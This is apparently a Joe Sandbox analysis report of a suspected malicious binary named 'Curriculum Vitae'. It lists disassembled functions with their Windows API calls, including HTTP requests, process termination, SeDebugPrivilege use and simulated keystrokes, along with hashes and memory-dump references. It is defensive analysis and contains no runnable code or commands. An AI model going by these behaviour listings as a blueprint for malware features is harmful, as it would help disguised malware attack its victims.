                      • Opcode ID: fa4bd243db98be75660d104545fb2528362f7165dcd8ab305aa61d460154ba52
                      • Instruction ID: 2645a25f995776d91de216875c6ee06e35f23447bceed80dff065e649d4f8f5b
                      • Opcode Fuzzy Hash: fa4bd243db98be75660d104545fb2528362f7165dcd8ab305aa61d460154ba52
                      • Instruction Fuzzy Hash: 74119376640508BFCB06EF54D882CED3BA5FF45390F4144A6FA489B222DB31EA509FB0
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D31459
                      • OleUninitialize.OLE32(?,00000000), ref: 00D314F8
                      • UnregisterHotKey.USER32(?), ref: 00D316DD
                      • DestroyWindow.USER32(?), ref: 00D724B9
                      • FreeLibrary.KERNEL32(?), ref: 00D7251E
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D7254B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 469580280-3243417748
                      • Opcode ID: 6827b4793151a774bab340a1e2bdda1f52c5de8c0f10434bcbbf6087aa482b88
                      • Instruction ID: 3ec070c07dc8eee3ea2e4b4e4ade6c183cd686ccf5ff11b5b61050eeb4a8fb56
                      • Opcode Fuzzy Hash: 6827b4793151a774bab340a1e2bdda1f52c5de8c0f10434bcbbf6087aa482b88
                      • Instruction Fuzzy Hash: F9D137356012538FCB29EF55C899A29F7A5FF05700F1882ADE54AAB261DB30ED12CF71
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00D35C7A
                        • Part of subcall function 00D35D0A: GetClientRect.USER32(?,?), ref: 00D35D30
                        • Part of subcall function 00D35D0A: GetWindowRect.USER32(?,?), ref: 00D35D71
                        • Part of subcall function 00D35D0A: ScreenToClient.USER32(?,?), ref: 00D35D99
                      • GetDC.USER32 ref: 00D746F5
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D74708
                      • SelectObject.GDI32(00000000,00000000), ref: 00D74716
                      • SelectObject.GDI32(00000000,00000000), ref: 00D7472B
                      • ReleaseDC.USER32(?,00000000), ref: 00D74733
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D747C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: bef4d3dd663e405576cad8712b9f15609237bb4316d871a3783f07ba8ed2ea84
                      • Instruction ID: 28c0de714c90962a12872fbd92b35552196a213212dfc41bce69f02ac4fc9947
                      • Opcode Fuzzy Hash: bef4d3dd663e405576cad8712b9f15609237bb4316d871a3783f07ba8ed2ea84
                      • Instruction Fuzzy Hash: 2771C331400205DFCF268F64C984AFA7BB5FF46354F188269E9995A26AD731D841DFB0
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DA35E4
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • LoadStringW.USER32(00E02390,?,00000FFF,?), ref: 00DA360A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LoadString$_wcslen
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 4099089115-2391861430
                      • Opcode ID: 3b22094cc59731d5a13db89f7c3d840544b85868cbeadcf8ca3dbb6fffe54615
                      • Instruction ID: 8719053aa376a117f6828fff84ded2c5c1bad3be660acfe6143d84c758a87f7b
                      • Opcode Fuzzy Hash: 3b22094cc59731d5a13db89f7c3d840544b85868cbeadcf8ca3dbb6fffe54615
                      • Instruction Fuzzy Hash: 62515D7180020ABBDF15EBA4CD52EEEBB79EF05300F145165F205721A1EB715A99DFB0
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DAC272
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DAC29A
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DAC2CA
                      • GetLastError.KERNEL32 ref: 00DAC322
                      • SetEvent.KERNEL32(?), ref: 00DAC336
                      • InternetCloseHandle.WININET(00000000), ref: 00DAC341
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 3113390036-3916222277
                      • Opcode ID: f82f7153cef4bfc4d4268f850ba199c0070269a251e18316a4327fe525aff6c6
                      • Instruction ID: 6270b10b671975a8d280393ee9e781ad3315321284bb2b06bdbb8c08b755d8e8
                      • Opcode Fuzzy Hash: f82f7153cef4bfc4d4268f850ba199c0070269a251e18316a4327fe525aff6c6
                      • Instruction Fuzzy Hash: A9319171510305AFDB219F648C88E6B7BFCEB4A750F14951DF48AD2250DB34DD059B74
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D73AAF,?,?,Bad directive syntax error,00DCCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D998BC
                      • LoadStringW.USER32(00000000,?,00D73AAF,?), ref: 00D998C3
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D99987
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString_wcslen
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 858772685-4153970271
                      • Opcode ID: 5d53eb419cbae6f2d8551a2cf66e499800de18479ba4839dcb3483c516e23b11
                      • Instruction ID: 81cdaf50f29e54c6685ff0ec34d0244a037708098ad9dcafade058667cd799cd
                      • Opcode Fuzzy Hash: 5d53eb419cbae6f2d8551a2cf66e499800de18479ba4839dcb3483c516e23b11
                      • Instruction Fuzzy Hash: 69215E3184421EBBCF15AF94CC16EEEB775FF18300F049459F619660A2EB719618DB70
                      APIs
                      • GetParent.USER32 ref: 00D920AB
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00D920C0
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D9214D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1290815626-3381328864
                      • Opcode ID: 21df79266281644e098cc8f76d1c07c112a1b934f79fdbdfa6e983d6cb15773e
                      • Instruction ID: 25aba6a8aabafc95e6fb08311d45790df247909ad4ffdd63a263dc34f98a3f5b
                      • Opcode Fuzzy Hash: 21df79266281644e098cc8f76d1c07c112a1b934f79fdbdfa6e983d6cb15773e
                      • Instruction Fuzzy Hash: 8F1106766C870BBAFF112220EC0BDB6379CCB05329F214116FF08B50E5EA61A85A5634
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                      • String ID:
                      • API String ID: 1282221369-0
                      • Opcode ID: 06cf899d4e10863f1ca137d55d447d3c8d0cfc3bf52276a842fa1a6a6049288e
                      • Instruction ID: 1faa38f59612ce919f1159f82dda1820a9a37ee5487e4482250e51f085bce5cc
                      • Opcode Fuzzy Hash: 06cf899d4e10863f1ca137d55d447d3c8d0cfc3bf52276a842fa1a6a6049288e
                      • Instruction Fuzzy Hash: 68613871A06301AFDF25EFB49881B7A7BA6EF45350F08416DF985E7282DB329D4187B0
                      APIs
                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D86890
                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D868A9
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D868B9
                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D868D1
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D868F2
                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D48874,00000000,00000000,00000000,000000FF,00000000), ref: 00D86901
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D8691E
                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D48874,00000000,00000000,00000000,000000FF,00000000), ref: 00D8692D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                      • String ID:
                      • API String ID: 1268354404-0
                      • Opcode ID: cfef7c794609a5d7aee8854bab21001c3fd521b6faad17e047dc94e0963c481d
                      • Instruction ID: d7e4864ee3a35a2d2439c9253136de2d28cd4957758782f64884ac3e8dc1aa82
                      • Opcode Fuzzy Hash: cfef7c794609a5d7aee8854bab21001c3fd521b6faad17e047dc94e0963c481d
                      • Instruction Fuzzy Hash: 04516970A0020AEFDB20DF25CC95FAA7BB5EB48760F144518F956A72E0DB71E990DB60
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DAC182
                      • GetLastError.KERNEL32 ref: 00DAC195
                      • SetEvent.KERNEL32(?), ref: 00DAC1A9
                        • Part of subcall function 00DAC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DAC272
                        • Part of subcall function 00DAC253: GetLastError.KERNEL32 ref: 00DAC322
                        • Part of subcall function 00DAC253: SetEvent.KERNEL32(?), ref: 00DAC336
                        • Part of subcall function 00DAC253: InternetCloseHandle.WININET(00000000), ref: 00DAC341
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                      • String ID:
                      • API String ID: 337547030-0
                      • Opcode ID: ebe80fb9986ea4bf3205b1b8176f85fd2bc7cafc1e6b652694c5ea7850d4ba5c
                      • Instruction ID: 04ed7262c282d9eca7bd14284f9a2a968a6a734385cae9084718b00858da57ce
                      • Opcode Fuzzy Hash: ebe80fb9986ea4bf3205b1b8176f85fd2bc7cafc1e6b652694c5ea7850d4ba5c
                      • Instruction Fuzzy Hash: 7B31AE71221706AFDB219FA5DD04B66BBF8FF1A320B04641DFA5AC6610D731E810DBB4
                      APIs
                        • Part of subcall function 00D93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D93A57
                        • Part of subcall function 00D93A3D: GetCurrentThreadId.KERNEL32 ref: 00D93A5E
                        • Part of subcall function 00D93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D925B3), ref: 00D93A65
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D925BD
                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D925DB
                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00D925DF
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D925E9
                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D92601
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00D92605
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D9260F
                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D92623
                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00D92627
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                      • String ID:
                      • API String ID: 2014098862-0
                      • Opcode ID: c86bbeb0331835b461c13c26c9a5602cc48dbbaac7ef592d8180fd10522891c5
                      • Instruction ID: 0a95adaf2a9208ae40e8b6ba972efb25392c5e47fd44f6f1ead1ee629811f216
                      • Opcode Fuzzy Hash: c86bbeb0331835b461c13c26c9a5602cc48dbbaac7ef592d8180fd10522891c5
                      • Instruction Fuzzy Hash: CC01D4307A0311BBFB1067699C8AF593F59DB5EB12F111001F358EE2E1C9E264458AB9
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00D91449,?,?,00000000), ref: 00D9180C
                      • HeapAlloc.KERNEL32(00000000,?,00D91449,?,?,00000000), ref: 00D91813
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D91449,?,?,00000000), ref: 00D91828
                      • GetCurrentProcess.KERNEL32(?,00000000,?,00D91449,?,?,00000000), ref: 00D91830
                      • DuplicateHandle.KERNEL32(00000000,?,00D91449,?,?,00000000), ref: 00D91833
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D91449,?,?,00000000), ref: 00D91843
                      • GetCurrentProcess.KERNEL32(00D91449,00000000,?,00D91449,?,?,00000000), ref: 00D9184B
                      • DuplicateHandle.KERNEL32(00000000,?,00D91449,?,?,00000000), ref: 00D9184E
                      • CreateThread.KERNEL32(00000000,00000000,00D91874,00000000,00000000,00000000), ref: 00D91868
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      • Opcode ID: 5dd5bb87070a4a95834f900f380830749059b7fae03b88bf3f16d902fc8754c3
                      • Instruction ID: ea85d310045cba495e7e0a680f69ce26346e224a6b954b20c7807d34cb9251df
                      • Opcode Fuzzy Hash: 5dd5bb87070a4a95834f900f380830749059b7fae03b88bf3f16d902fc8754c3
                      • Instruction Fuzzy Hash: 9B01BFB5250345BFE710ABA6DC4DF5B3B6CEB89B11F045411FB05DB291C6749800CB30
                      APIs
                        • Part of subcall function 00D9D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00D9D501
                        • Part of subcall function 00D9D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00D9D50F
                        • Part of subcall function 00D9D4DC: CloseHandle.KERNEL32(00000000), ref: 00D9D5DC
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBA16D
                      • GetLastError.KERNEL32 ref: 00DBA180
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBA1B3
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DBA268
                      • GetLastError.KERNEL32(00000000), ref: 00DBA273
                      • CloseHandle.KERNEL32(00000000), ref: 00DBA2C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      • Opcode ID: e5c1b5000dd09b1210758ea9dd66577977f9fe461b23a67223b3b1d666f05a20
                      • Instruction ID: 75fbfcf95ae93919d6202487f905eb45e834cfa4aa42726e2f486c5bf5d2b969
                      • Opcode Fuzzy Hash: e5c1b5000dd09b1210758ea9dd66577977f9fe461b23a67223b3b1d666f05a20
                      • Instruction Fuzzy Hash: 07618E34204242EFD720DF19C494F55BBE1AF44318F18849CE46A8BBA3C772ED45CBA2
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DC3925
                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DC393A
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC3954
                      • _wcslen.LIBCMT ref: 00DC3999
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DC39C6
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DC39F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcslen
                      • String ID: SysListView32
                      • API String ID: 2147712094-78025650
                      • Opcode ID: 4ab4f9310ffc53614ba93bd769c581b30f43548e3c2b25da578865e331fb8f4d
                      • Instruction ID: 41c429da3913cce829e84751a80eb1877b51188aceba66079794fcc556d33e85
                      • Opcode Fuzzy Hash: 4ab4f9310ffc53614ba93bd769c581b30f43548e3c2b25da578865e331fb8f4d
                      • Instruction Fuzzy Hash: F141B231A0031AABDF219F64CC45FEA77A9EF08350F14452AF958E7291D771DA84CBB0
                      APIs
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D9BCFD
                      • IsMenu.USER32(00000000), ref: 00D9BD1D
                      • CreatePopupMenu.USER32 ref: 00D9BD53
                      • GetMenuItemCount.USER32(016E75E0), ref: 00D9BDA4
                      • InsertMenuItemW.USER32(016E75E0,?,00000001,00000030), ref: 00D9BDCC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                      • String ID: 0$2
                      • API String ID: 93392585-3793063076
                      • Opcode ID: 4f27d6f48072e813b0d3165092925bc62b3883a24c5511578764cca0de9dc7d8
                      • Instruction ID: 3a5c21a1bdf2e8a118d009b358c44b72a27ce96946e780e6ad40e71dd9ef1ef9
                      • Opcode Fuzzy Hash: 4f27d6f48072e813b0d3165092925bc62b3883a24c5511578764cca0de9dc7d8
                      • Instruction Fuzzy Hash: 7651BF70A003099BDF10DFA8EA88BAEBBF4FF45324F19415AE546D7290E7709945CB71
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00D9C913
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      • Opcode ID: 295a022eaa994606715ff0514be7ac6844719ef0426aaa4865126246ac95dfe8
                      • Instruction ID: 37d09b07ddc2b5d8eed7e4094068b1aa22f46e81d3d31eba10b3b775729342c0
                      • Opcode Fuzzy Hash: 295a022eaa994606715ff0514be7ac6844719ef0426aaa4865126246ac95dfe8
                      • Instruction Fuzzy Hash: B7112B3169930BBEAF046B149C82CAA779CDF1531EB20502AF904A6282D760DD445775
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$LocalTime
                      • String ID:
                      • API String ID: 952045576-0
                      APIs
